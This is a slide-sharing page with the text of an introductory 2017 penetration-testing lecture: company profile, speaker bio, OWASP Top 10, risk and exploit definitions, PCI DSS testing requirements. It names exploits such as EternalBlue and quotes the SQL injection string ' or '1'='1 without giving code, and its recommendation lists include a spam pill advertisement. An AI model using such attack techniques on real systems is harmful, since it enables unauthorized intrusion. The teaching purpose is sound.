Enviar pesquisa
Carregar
Pentest 101 @ Mahanakorn Network Research Laboratory
•
4 gostaram
•
780 visualizações
P
Pichaya Morimoto
Seguir
Free event from Mahanakorn University of Technology (MUT) June 19, 2017
Leia menos
Leia mais
Tecnologia
Denunciar
Compartilhar
Denunciar
Compartilhar
1 de 60
Baixar agora
Baixar para ler offline
Recomendados
Security Misconfiguration (OWASP Top 10 - 2013 - A5)
Security Misconfiguration (OWASP Top 10 - 2013 - A5)
Pichaya Morimoto
Burp Extender API for Penetration Testing
Burp Extender API for Penetration Testing
Pichaya Morimoto
Bug Bounty แบบแมว ๆ
Bug Bounty แบบแมว ๆ
Pichaya Morimoto
Alexander Antukh. (In)security of Appliances
Alexander Antukh. (In)security of Appliances
Positive Hack Days
Alexander Antukh
Alexander Antukh
Positive Hack Days
Csw2016 freingruber bypassing_application_whitelisting
Csw2016 freingruber bypassing_application_whitelisting
CanSecWest
Mid market collaboration architecture presentation
Mid market collaboration architecture presentation
Trinny Chacko
APN Auckland Event 9 - Scrum 101, Unleashing the Theory
APN Auckland Event 9 - Scrum 101, Unleashing the Theory
Carolyn Sanders
Recomendados
Security Misconfiguration (OWASP Top 10 - 2013 - A5)
Security Misconfiguration (OWASP Top 10 - 2013 - A5)
Pichaya Morimoto
Burp Extender API for Penetration Testing
Burp Extender API for Penetration Testing
Pichaya Morimoto
Bug Bounty แบบแมว ๆ
Bug Bounty แบบแมว ๆ
Pichaya Morimoto
Alexander Antukh. (In)security of Appliances
Alexander Antukh. (In)security of Appliances
Positive Hack Days
Alexander Antukh
Alexander Antukh
Positive Hack Days
Csw2016 freingruber bypassing_application_whitelisting
Csw2016 freingruber bypassing_application_whitelisting
CanSecWest
Mid market collaboration architecture presentation
Mid market collaboration architecture presentation
Trinny Chacko
APN Auckland Event 9 - Scrum 101, Unleashing the Theory
APN Auckland Event 9 - Scrum 101, Unleashing the Theory
Carolyn Sanders
Ncc Group Escrow Overview 2010
Ncc Group Escrow Overview 2010
Jonnyhyde
Ntm 2.0 arvola presentation
Ntm 2.0 arvola presentation
Milla Granlund
Cisco SecureX.pdf
Cisco SecureX.pdf
WildhaniIhyaraRahman1
[CLASS 2014] Palestra Técnica - Alexandre Euclides
[CLASS 2014] Palestra Técnica - Alexandre Euclides
TI Safe
The Savvy Security Leader: Using Guerrilla Tactics to ID Security Program Res...
The Savvy Security Leader: Using Guerrilla Tactics to ID Security Program Res...
Denim Group
Helpful Practices in Agile Testing
Helpful Practices in Agile Testing
Josiah Renaudin
Ahmed Sami Ahmed CV v8.0 Decision Support & Technology Director
Ahmed Sami Ahmed CV v8.0 Decision Support & Technology Director
Ahmed Sami
Securityinfosearch introduction
Securityinfosearch introduction
sequraconsulting
HIMANSHU BHARDWAJ
HIMANSHU BHARDWAJ
Himanshu Bhardwaj
«Product Security Incident Response Team (PSIRT) - Изнутри Cisco PSIRT», Алек...
«Product Security Incident Response Team (PSIRT) - Изнутри Cisco PSIRT», Алек...
Mail.ru Group
2015 GPDIS_ThurstonTummescheitProductLines_Ver10
2015 GPDIS_ThurstonTummescheitProductLines_Ver10
Foliage
Shift Left Security: Development Does Not Want to Own It.
Shift Left Security: Development Does Not Want to Own It.
Aggregage
Practical AD Security: How to Secure Your Active Directory Network Without Br...
Practical AD Security: How to Secure Your Active Directory Network Without Br...
Frank Lesniak
Better Security Testing: Using the Cloud and Continuous Delivery
Better Security Testing: Using the Cloud and Continuous Delivery
TechWell
Strategies on How to Overcome Security Challenges Unique to Cloud-Native Apps
Strategies on How to Overcome Security Challenges Unique to Cloud-Native Apps
VMware Tanzu
Industry 4.0 and security
Industry 4.0 and security
Denis Jakuzza
Data Consult - Managed Security Services
Data Consult - Managed Security Services
Jad Bejjani
Georgi hristov continuous integration-for mobile test automation
Georgi hristov continuous integration-for mobile test automation
Romania Testing
{Ca} the future of video
{Ca} the future of video
Patrick Lopez
Alexyj Kovaliov "Waterfalling to Agile"
Alexyj Kovaliov "Waterfalling to Agile"
Agile Lietuva
ยกระดับศักยภาพของทีม IT Security องค์กรด้วย CTF & Cybersecurity Online Platfo...
ยกระดับศักยภาพของทีม IT Security องค์กรด้วย CTF & Cybersecurity Online Platfo...
Pichaya Morimoto
Securing and Hacking LINE OA Integration
Securing and Hacking LINE OA Integration
Pichaya Morimoto
Mais conteúdo relacionado
Semelhante a Pentest 101 @ Mahanakorn Network Research Laboratory
Ncc Group Escrow Overview 2010
Ncc Group Escrow Overview 2010
Jonnyhyde
Ntm 2.0 arvola presentation
Ntm 2.0 arvola presentation
Milla Granlund
Cisco SecureX.pdf
Cisco SecureX.pdf
WildhaniIhyaraRahman1
[CLASS 2014] Palestra Técnica - Alexandre Euclides
[CLASS 2014] Palestra Técnica - Alexandre Euclides
TI Safe
The Savvy Security Leader: Using Guerrilla Tactics to ID Security Program Res...
The Savvy Security Leader: Using Guerrilla Tactics to ID Security Program Res...
Denim Group
Helpful Practices in Agile Testing
Helpful Practices in Agile Testing
Josiah Renaudin
Ahmed Sami Ahmed CV v8.0 Decision Support & Technology Director
Ahmed Sami Ahmed CV v8.0 Decision Support & Technology Director
Ahmed Sami
Securityinfosearch introduction
Securityinfosearch introduction
sequraconsulting
HIMANSHU BHARDWAJ
HIMANSHU BHARDWAJ
Himanshu Bhardwaj
«Product Security Incident Response Team (PSIRT) - Изнутри Cisco PSIRT», Алек...
«Product Security Incident Response Team (PSIRT) - Изнутри Cisco PSIRT», Алек...
Mail.ru Group
2015 GPDIS_ThurstonTummescheitProductLines_Ver10
2015 GPDIS_ThurstonTummescheitProductLines_Ver10
Foliage
Shift Left Security: Development Does Not Want to Own It.
Shift Left Security: Development Does Not Want to Own It.
Aggregage
Practical AD Security: How to Secure Your Active Directory Network Without Br...
Practical AD Security: How to Secure Your Active Directory Network Without Br...
Frank Lesniak
Better Security Testing: Using the Cloud and Continuous Delivery
Better Security Testing: Using the Cloud and Continuous Delivery
TechWell
Strategies on How to Overcome Security Challenges Unique to Cloud-Native Apps
Strategies on How to Overcome Security Challenges Unique to Cloud-Native Apps
VMware Tanzu
Industry 4.0 and security
Industry 4.0 and security
Denis Jakuzza
Data Consult - Managed Security Services
Data Consult - Managed Security Services
Jad Bejjani
Georgi hristov continuous integration-for mobile test automation
Georgi hristov continuous integration-for mobile test automation
Romania Testing
{Ca} the future of video
{Ca} the future of video
Patrick Lopez
Alexyj Kovaliov "Waterfalling to Agile"
Alexyj Kovaliov "Waterfalling to Agile"
Agile Lietuva
Semelhante a Pentest 101 @ Mahanakorn Network Research Laboratory
(20)
Ncc Group Escrow Overview 2010
Ncc Group Escrow Overview 2010
Ntm 2.0 arvola presentation
Ntm 2.0 arvola presentation
Cisco SecureX.pdf
Cisco SecureX.pdf
[CLASS 2014] Palestra Técnica - Alexandre Euclides
[CLASS 2014] Palestra Técnica - Alexandre Euclides
The Savvy Security Leader: Using Guerrilla Tactics to ID Security Program Res...
The Savvy Security Leader: Using Guerrilla Tactics to ID Security Program Res...
Helpful Practices in Agile Testing
Helpful Practices in Agile Testing
Ahmed Sami Ahmed CV v8.0 Decision Support & Technology Director
Ahmed Sami Ahmed CV v8.0 Decision Support & Technology Director
Securityinfosearch introduction
Securityinfosearch introduction
HIMANSHU BHARDWAJ
HIMANSHU BHARDWAJ
«Product Security Incident Response Team (PSIRT) - Изнутри Cisco PSIRT», Алек...
«Product Security Incident Response Team (PSIRT) - Изнутри Cisco PSIRT», Алек...
2015 GPDIS_ThurstonTummescheitProductLines_Ver10
2015 GPDIS_ThurstonTummescheitProductLines_Ver10
Shift Left Security: Development Does Not Want to Own It.
Shift Left Security: Development Does Not Want to Own It.
Practical AD Security: How to Secure Your Active Directory Network Without Br...
Practical AD Security: How to Secure Your Active Directory Network Without Br...
Better Security Testing: Using the Cloud and Continuous Delivery
Better Security Testing: Using the Cloud and Continuous Delivery
Strategies on How to Overcome Security Challenges Unique to Cloud-Native Apps
Strategies on How to Overcome Security Challenges Unique to Cloud-Native Apps
Industry 4.0 and security
Industry 4.0 and security
Data Consult - Managed Security Services
Data Consult - Managed Security Services
Georgi hristov continuous integration-for mobile test automation
Georgi hristov continuous integration-for mobile test automation
{Ca} the future of video
{Ca} the future of video
Alexyj Kovaliov "Waterfalling to Agile"
Alexyj Kovaliov "Waterfalling to Agile"
Mais de Pichaya Morimoto
ยกระดับศักยภาพของทีม IT Security องค์กรด้วย CTF & Cybersecurity Online Platfo...
ยกระดับศักยภาพของทีม IT Security องค์กรด้วย CTF & Cybersecurity Online Platfo...
Pichaya Morimoto
Securing and Hacking LINE OA Integration
Securing and Hacking LINE OA Integration
Pichaya Morimoto
Docker Plugin For DevSecOps
Docker Plugin For DevSecOps
Pichaya Morimoto
Mysterious Crypto in Android Biometrics
Mysterious Crypto in Android Biometrics
Pichaya Morimoto
Web Hacking with Object Deserialization
Web Hacking with Object Deserialization
Pichaya Morimoto
Exploiting Blind Vulnerabilities
Exploiting Blind Vulnerabilities
Pichaya Morimoto
From Web Vulnerability to Exploit in 15 minutes
From Web Vulnerability to Exploit in 15 minutes
Pichaya Morimoto
Exploiting WebApp Race Condition Vulnerability 101
Exploiting WebApp Race Condition Vulnerability 101
Pichaya Morimoto
CTF คืออะไร เรียนแฮก? ลองแฮก? แข่งแฮก?
CTF คืออะไร เรียนแฮก? ลองแฮก? แข่งแฮก?
Pichaya Morimoto
Vulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP Framework
Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
Pichaya Morimoto
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya Morimoto
Pichaya Morimoto
Mais de Pichaya Morimoto
(12)
ยกระดับศักยภาพของทีม IT Security องค์กรด้วย CTF & Cybersecurity Online Platfo...
ยกระดับศักยภาพของทีม IT Security องค์กรด้วย CTF & Cybersecurity Online Platfo...
Securing and Hacking LINE OA Integration
Securing and Hacking LINE OA Integration
Docker Plugin For DevSecOps
Docker Plugin For DevSecOps
Mysterious Crypto in Android Biometrics
Mysterious Crypto in Android Biometrics
Web Hacking with Object Deserialization
Web Hacking with Object Deserialization
Exploiting Blind Vulnerabilities
Exploiting Blind Vulnerabilities
From Web Vulnerability to Exploit in 15 minutes
From Web Vulnerability to Exploit in 15 minutes
Exploiting WebApp Race Condition Vulnerability 101
Exploiting WebApp Race Condition Vulnerability 101
CTF คืออะไร เรียนแฮก? ลองแฮก? แข่งแฮก?
CTF คืออะไร เรียนแฮก? ลองแฮก? แข่งแฮก?
Vulnerable Active Record: A tale of SQL Injection in PHP Framework
Vulnerable Active Record: A tale of SQL Injection in PHP Framework
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya Morimoto
Último
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Zilliz
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
MadyBayot
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
Dropbox
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Victor Rentea
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
panagenda
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
apidays
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
apidays
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
Zilliz
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
Remote DBA Services
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
Zilliz
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Jeffrey Haguewood
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
Nanddeep Nachan
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
apidays
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
The Digital Insurer
Cyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdf
Overkill Security
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
sudhanshuwaghmare1
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
Andrey Devyatkin
Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024
The Digital Insurer
Último
(20)
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
Cyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdf
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024
Pentest 101 @ Mahanakorn Network Research Laboratory
1.
Version: [--VX.X--] Date: [--YYYY-MM-DD--] Author:
[--Author--] Responsible: [--Responsible--] Confidentiality Class: [--Confidentiality Class--] Version: 1.0 Date: 2017-06-17 Author: P. Morimoto Responsible: P. Morimoto Confidentiality Class: Public Pentest 101
2.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved Vienna (HQ) | AT Wiener Neustadt | AT Vilnius | LT Berlin| DE Montreal | CA Singapore | SG Moscow | RU Zurich | CH SEC Consult Offices SEC Consult Clients Bangkok | TH SEC Consult – Who we are Found in 2002 70+ Security Experts 400+ Security Audits per year Globally operating SEC Consult Vulnerability Lab Malaysia | MY Luxembourg | LU Linz | AT
3.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved Advisor for information security Expert for the implementation of security processes and policies (ISO 27001, BS 25999, GSHB) Leading company for technical security audits Specialist for web application security according to ONR 17700 Independent of product manufacturers Our customers are public authorities, financial institutions and insurance companies in Central Europe Sectoral orientation (defence, public, finance, industry) SEC Consult – Who we are 3
4.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 4 ISO/IEC 27001 Certificate entire company within certification scope certified since 16.01.2008
5.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 5 SEC Consult Vulnerability Lab European leading research lab for the identification of vulnerabilities and the analysis of new technologies, products and applications (security advisories) Integral part of the education and the further training of the security experts at SEC Consult Early information of our customers due to SEC Consult security alerts Support of well-known manufacturers to enhance the security of their products Companies and organisations SEC Consult has released security advisories for (excerpt). For details see: http://www.sec-consult.com/72.html
6.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 6 Who am I ? (Professional) Pichaya Morimoto IT Security Consultant Certifications: • Offensive Security Certified Professional (OSCP) • GIAC Web Application Penetration Tester (GWAPT) • Certified Ethical Hacker (CEH) • CompTIA Security+ Published Security Advisories: • 2014 - Privilege Escalation in Snort pfSense Package - Wordpress TimThumb 2.8.13 WebShot RCE - HybridAuth install.php PHP RCE • 2015 - PHP MoAdmin 1.1.2 RCE - Schedule Facebook Posts 1.5.6 SQL Injection - Lime Survey Multiple Critical Vulnerabilities • 2016 - Yeager CMS Multiple Critical Vulnerabilities - ASUS DSL-N55U router Multiple Vulnerabilities - LINE platform Multiple Vulnerabilities • 2017 - Aruba AirWave 8.2.3 External Entity Injection
7.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 7 Who am I ? (Personal) Co-administrator of สอนแฮกเว็บแบบแมว ๆ *Former* CTF Player of Pwnladin Team Co-administrator of 2600 Thailand Security Addict http://thehackernews.com/2014/06/zero-day-timthumb-webshot-vulnerability.html
8.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 8 Who am I ? (Personal) OWASP Thailand Meeting 3/2014 Topic: SQL Injection 101 : It is not just about ' or '1'='1 OWASP Thailand Meeting 5/2015 Topic: SQLi + Secure Coding with Hands-on OWASP Thailand Meeting 7/2016 Topic: Security Misconfiguration OWASP Thailand Meeting 2/2017 Topic: OWASP Top Ten Proactive Controls 2016 ….
9.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 9 Who am I ? (Personal) • Bug Bounty hunter • Occasionally, kill bugs for free Metasploit modules: • exploit/multi/http/phpmoadmin_exec • exploit/unix/webapp/hybridauth_install _php_exec • auxiliary/admin/http/limesurvey_file_ download and a lot more private exploit research and developments : )
10.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved Who am I ? (Personal) 10 Special Contributor in LINE Security Bug Bounty Program • https://bugbounty.linecorp.com/en/halloffame/ (2017) • https://bugbounty.linecorp.com/en/halloffame/2016/ (2016)
11.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 11 Today’s Objective 1. Introduction to Penetration Testing • What is Penetration Testing ? • Importance of Penetration Testing • Risk, Vulnerability and Exploit 2. Understand the difference between types of security testing • Vulnerability Assessment (VA) • Penetration Testing • Blackbox, whitebox and greybox 3. A quick glance at Penetration Testing methodologies • Public guidelines • Major activities in Penetration Testing phases • Pre-engagement • Engagement • Post-engagement 4. Basic steps for attacking a target system • Case studies
12.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 12 Notice The information provided in this presentation is collected from publicly available websites and online documents. SEC Consult have improved version of these methodologies but it cannot be presented here due to confidentiality of our business.
13.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 13 What is Penetration Testing? (also called Pentest) Penetration Testing “an authorized simulated attack on a computer system that looks for security weaknesses, potentially gaining access to the system's features and data.” https://en.wikipedia.org/wiki/Penetration_test Goal To increase the security of the system (= network, - application) being tested.
14.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 14 Attack on a Computer System! Gain access to restricted resources • Unauthorized access to restricted data • Cross-tenant data access between users • From application user to administrator • From application user to local OS user/administrator • Break into hosts in an internal network Identify security misconfigurations and insecure implementation • Insecure configuration of system services and applications • Bypass security constraints (login, OTP, access control, payment etc.) • Missing security patches Privacy You need to think like the bad guys.
15.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 15 OWASP Top 10 (WebApp) https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project (Release Candidate)
16.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 16 Pentest a Website: The Outcome Sample list of vulnerabilities: • SQL injection • Broken access control • Bypass OTP verification • User denial of service • Improper use of encryption • Stored cross-site scripting • XML external entity injection • Upload of arbitrary files • Remote code execution
17.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved Vulnerability in Standard Software 17 http://www.securityweek.com/aruba-patches-vulnerabilities-airwave-product • Found during an internal audit • Managed to read credentials of all APs • Notified the vendor to fix security flaw • Helps protect thousand of users from cyber attacks
18.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 18 Risk, Vulnerability and Exploit Risk Vulnerability • SQL injection, cross-site scripting … • Missing function level access control • Insufficient network segmentation Exploit An attempt to verify the risk by attacking the identified vulnerability https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology
19.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 19 Sample Exploit Code << EternalBlue exploit Blind SQL injection exploit >>
20.
© 2013 SEC
Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 20 Importance of Penetration Testing • Identify vulnerabilities and security misconfigurations • Measure the effectiveness of the existing security controls • Identify gaps in compliance (ISO 27001, PCI DSS etc.) • A requirement from customer, partner or company’s HQ PCI DSS v3.2, Requirement 11.3 Requirement 11.3.1: Conduct external penetration testing at least annually or after any significant change has occurred in organization’s environment Requirement 11.3.2: Conduct internal penetration testing at least annually or after any significant change has occurred in organization’s environment Requirement 11.3.3: Exploitable vulnerabilities identified during testing shall be corrected and testing shall be repeated to verify corrections Requirement 11.3.4: Perform network segmentation testing to validate if segmentation controls and methods are effective and operational
21.
© 2013 SEC
